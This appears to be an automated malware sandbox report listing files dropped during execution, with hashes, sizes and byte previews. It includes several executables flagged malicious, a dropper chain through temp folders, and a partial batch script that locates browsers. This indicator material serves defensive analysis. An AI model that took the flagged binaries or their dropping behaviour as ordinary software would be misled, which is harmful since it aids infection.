Encrypted:	false
SSDEEP:	96:6SSqlOXRa6okpxxjL3u5O70fEzS/hUGJsVczEDqNsfU04UIc2rWq:6SS1haEbxjL3DI/hUqMV0s9/2H
MD5:	AEF1C31A994A0FEC74DD6D61A50F46BC
SHA1:	65BC7C6B7E009ED48DBBD9A6E94880DB5CDA4384
SHA-256:	40BDD8A11BC7F9D7CA7F8BB891447AB45BDB2211BE0F607CF70804324763A8A3
SHA-512:	82A6E8E08835599E6BDEFCF9D2F52AF13E697B252163DA73DF0102B0D174B2A79F467465437C0A3B7F4640F58D7E31105F78935085004E98441FB7F7CE516BD3
Malicious:	false
Preview:	.PNG........IHDR...............^....xPLTE/)+............. -()......0,... .....1,....*%'.....%%!"......igh..U.....>;<..?..1ZWX......q.......LIJ...\|zz......n..6....IDATx..\.{.:.E7..,+rD..........d.c......l].6..a.gH...+.l@6 .....d....l@6 .....d....l@6 .....d...Y....%..\|q~...H.b.....CK9...?..C3.0......p:1c...9...ZA(,.&.J.2v...WH...s6.U......j...5.P2>...K.q64}.........Zkk....A"...+..ZXaT...(.oB%...Qt5[..`S.? .........u).TR4%YhO3.. .[..9....F..@@D"1V.).x2.+....J.a....@,H2...3/.UH$..HU...o...@...!..]_JF.bkPv...({...$.~.[..(.b......j.v.`[.A..[.Vv%.\@$.I.5..2....Ln.Q..G.6...B(.. .....f.7..J...0!..+..o....dX......En..Q #.H.....E..j....6..-._x.."......J...,.8Dp.........w.,.C".6..(H.....L\.1&.G...eC....#>a.BP.."..-..W`.xVh..1.D.a-..Lj..._.W.#..B$.@.:.LH.......G........0.:.DC+.t~..p....s.L.A..UKS."E}i.(.B.h!P.C.....:.....(....Zy.4...A9.e.o..w...u.P@.-M..XRa57....T._$.2..I.e...rY 2m4.UbN-p......8.,.k.Iq.p.....,5Wv..].0(.I.X.d.lL @.jI ....S.!0orG.q..\|XV.k...Y...E

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074301.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 200 x 200, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4932
Entropy (8bit):	7.950481216633536
Encrypted:	false
SSDEEP:	96:6SSqlOXRa6okpxxjL3u5O70fEzS/hUGJsVczEDqNsfU04UIc2rWq:6SS1haEbxjL3DI/hUqMV0s9/2H
MD5:	AEF1C31A994A0FEC74DD6D61A50F46BC
SHA1:	65BC7C6B7E009ED48DBBD9A6E94880DB5CDA4384
SHA-256:	40BDD8A11BC7F9D7CA7F8BB891447AB45BDB2211BE0F607CF70804324763A8A3
SHA-512:	82A6E8E08835599E6BDEFCF9D2F52AF13E697B252163DA73DF0102B0D174B2A79F467465437C0A3B7F4640F58D7E31105F78935085004E98441FB7F7CE516BD3
Malicious:	false
Preview:	.PNG........IHDR...............^....xPLTE/)+............. -()......0,... .....1,....*%'.....%%!"......igh..U.....>;<..?..1ZWX......q.......LIJ...\|zz......n..6....IDATx..\.{.:.E7..,+rD..........d.c......l].6..a.gH...+.l@6 .....d....l@6 .....d....l@6 .....d...Y....%..\|q~...H.b.....CK9...?..C3.0......p:1c...9...ZA(,.&.J.2v...WH...s6.U......j...5.P2>...K.q64}.........Zkk....A"...+..ZXaT...(.oB%...Qt5[..`S.? .........u).TR4%YhO3.. .[..9....F..@@D"1V.).x2.+....J.a....@,H2...3/.UH$..HU...o...@...!..]_JF.bkPv...({...$.~.[..(.b......j.v.`[.A..[.Vv%.\@$.I.5..2....Ln.Q..G.6...B(.. .....f.7..J...0!..+..o....dX......En..Q #.H.....E..j....6..-._x.."......J...,.8Dp.........w.,.C".6..(H.....L\.1&.G...eC....#>a.BP.."..-..W`.xVh..1.D.a-..Lj..._.W.#..B$.@.:.LH.......G........0.:.DC+.t~..p....s.L.A..UKS."E}i.(.B.h!P.C.....:.....(....Zy.4...A9.e.o..w...u.P@.-M..XRa57....T._$.2..I.e...rY 2m4.UbN-p......8.,.k.Iq.p.....,5Wv..].0(.I.X.d.lL @.jI ....S.!0orG.q..\|XV.k...Y...E

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Download File

Process:	C:\Users\user\AppData\RoamingIJDGCAEBFI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1909760
Entropy (8bit):	7.949641205972528
Encrypted:	false
SSDEEP:	49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
MD5:	2AF5EB9FB318C9A454DE54914E121031
SHA1:	FCBAEA817B8EB0D63BA7B31804BE2353D564BA93
SHA-256:	589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
SHA-512:	5873029940644909567F97A6D4C78D78064E7FFF22CC5B90FDA5F8C31017B30CA7DD2FC7672F7AB7460EE49D6154ED23EF5A52EA0077D09347B0B9CA3E9839F4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................K...........@.......................... L......:....@.................................W...k...........................4.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...usoriijt......1.....................@...ymfuwjgb......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	250880
Entropy (8bit):	6.0281010030358635
Encrypted:	false
SSDEEP:	3072:QLCWSJzpVnjAyfwr2lY+EKv8QKH/se+lhjWDgKe2yhKVtFRX3vPTZY:PjJzbTg22wKHke+WDGyd3v
MD5:	45FD30020C12378C242DC90687EDC24C
SHA1:	934CD43FF8BD35E77D7DF2CBC3AA5D96B672E4BF
SHA-256:	F4A7D43DC4CDF21CC7A58AF7C66386CEA1616658F15B996691FBB85A7CB06B9D
SHA-512:	9122D305C9850DDDDF6CE60E03988DDFC60C29FF36D029E17FABBE3D1BC568433F1762E730852D7281021C9464874DEE7F6DC5D4293CE5A99F9E4E587BF742F2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@g.s... ... ... kpQ ... kpd ... kpP `.. .~i ... ... v.. kpU ... kp` ... kpg ... Rich... ........PE..L...{..d.....................x....... .......0....@..........................`......R@.......................................X..x...................................\Y...............................S..@............0...............................text............................... ..`.rdata...2...0...4... ..............@..@.data........p.......T..............@....xipewav.............0..............@..@.gata................4..............@....rsrc................8..............@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1f1ad62f-ff7e-49d7-8e04-39db617b0ac4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135751
Entropy (8bit):	7.804610863392373
Encrypted:	false
SSDEEP:	1536:h+OX7O5AeBWdSq2Zso2iDNjF3dNUPOTy61NVo8OJXhQXXUWFMOiiBIHWI7YyjM/8:pVdSj9hjVn6Oj5fOJR+k0iiW2IPMaIul
MD5:	83EF25FBEE6866A64F09323BFE1536E0
SHA1:	24E8BD033CD15E3CF4F4FF4C8123E1868544AC65
SHA-256:	F421D74829F2923FD9E5A06153E4E42DB011824C33475E564B17091598996E6F
SHA-512:	C699D1C9649977731EEA0CB4740C4BEAACEEC82AECC43F9F2B1E5625C487C0BC45FA08A1152A35EFBDB3DB73B8AF3625206315D1F9645A24E1969316F9F5B38C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7...Kk?....]<.S(.....9}........$..6...:...9..b\|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..\|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]....-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat

Download File

Process:	C:\Users\user\1000003002\ee7a49fbf0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2821
Entropy (8bit):	4.949249124498804
Encrypted:	false
SSDEEP:	48:Nd27V5rN81fN80XUbaOUb5OzQ/iqzQ/hXDTjODAKpxVgXDOev0W:j6rrN81fN80Ebanb5OzQ/iqzQ/hTTj+y
MD5:	DE9423D9C334BA3DBA7DC874AA7DBC28
SHA1:	BF38B137B8D780B3D6D62AEE03C9D3F73770D638
SHA-256:	A1E1B422C40FB611A50D3F8BF34F9819F76DDB304AA2D105FB49F41F57752698
SHA-512:	63F13ACD904378AD7DE22053E1087D61A70341F1891ADA3B671223FEC8F841B42B6F1060A4B18C8BB865EE4CD071CADC7FF6BD6D549760945BF1645A1086F401
Malicious:	false
Preview:	@shift /0..@echo off..setlocal....set "URL=https://www.youtube.com/account"....rem Initialize paths..set "chromePath="..set "edgePath="..set "firefoxPath="....rem Hardcoded paths..set "ProgramFiles64=C:\Program Files"..set "ProgramFiles86=C:\Program Files (x86)"....rem Check for Chrome in 64-bit system directory..if exist "%ProgramFiles64%\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%ProgramFiles64%\Google\Chrome\Application\chrome.exe".. goto check_edge..)....rem Check for Chrome in 32-bit system directory..if exist "%ProgramFiles86%\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%ProgramFiles86%\Google\Chrome\Application\chrome.exe".. goto check_edge..)....rem Check for Chrome in user profiles..for /d %%u in ("%SystemDrive%\Users\*") do (.. if exist "%%u\AppData\Local\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%%u\AppData\Local\Google\Chrome\Application\chrome.exe".. goto check_edge.. )..)....:check_edge....rem C

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\AppData\RoamingCBFCFBFBFB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1898496
Entropy (8bit):	7.950130111317579
Encrypted:	false
SSDEEP:	49152:5qE17IghRPKUd2LI/WYW+jNTxjgafw8TfzYBgx1ITA:5HdkRnSNTBg2/ug3WA
MD5:	8EF54B7689AF3A0FE5028BC42964BB26
SHA1:	DEBCB0EA69E4330873F281B0D9B34D15FC513ABC
SHA-256:	78305C8B5E8EAD6989A0AF09FC6ED8F2FF1B246C0487DFA78FB5B155B554CAE9
SHA-512:	8B2EE0C290A48F826BACAEAF949D7335B14F65DC8967D0BCB05AD386FDA9FAF5D6D016D66CE202CD7BE202EAF1981B6B17BB60DAE33DC085F28AAB9BE9D3986B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................K..........@.................................W...k.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...qzeqbxes......0.....................@...qgghuozc......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\65e00eb8-fa0d-49f1-b8bc-f4711b61fafa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\68feb22a-6757-4d89-898c-a5a2f5b8bb7b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\8716648c-3f5b-4159-9c44-711ea37f546a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	31335
Entropy (8bit):	7.694019108205432
Encrypted:	false
SSDEEP:	768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
MD5:	6B72597205C77D3E40E1A35BEE403801
SHA1:	6BECEE055C6E057AF9475B6D651B4EE561D02F20
SHA-256:	C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
SHA-512:	7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\ba2831a8-3ee9-48c8-80c9-0b333c714255.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	5.4040293101082035
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrf:8e2Fa116uCntc5toYgKQM
MD5:	65286A98C15213D81793C040438B399A
SHA1:	3027D1F55AC76C3F0A3A218276700DBB7C6F48B5
SHA-256:	A9A104B022614972A44002765EF5037F649F841FA72A9D674E2787F4AB166561
SHA-512:	51F68EBA0A7D29AEB66BF36F218E08A3362CF20983343F8692B0823F27CEE4FB8939F345F3355F27AB9747A87F4F6CA787D129D8C5D7338FBF3586825288F051
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Local\Temp\scoped_dir3452_1247697648\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir3452_1247697648\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir3452_1247697648\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir3452_1247697648\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
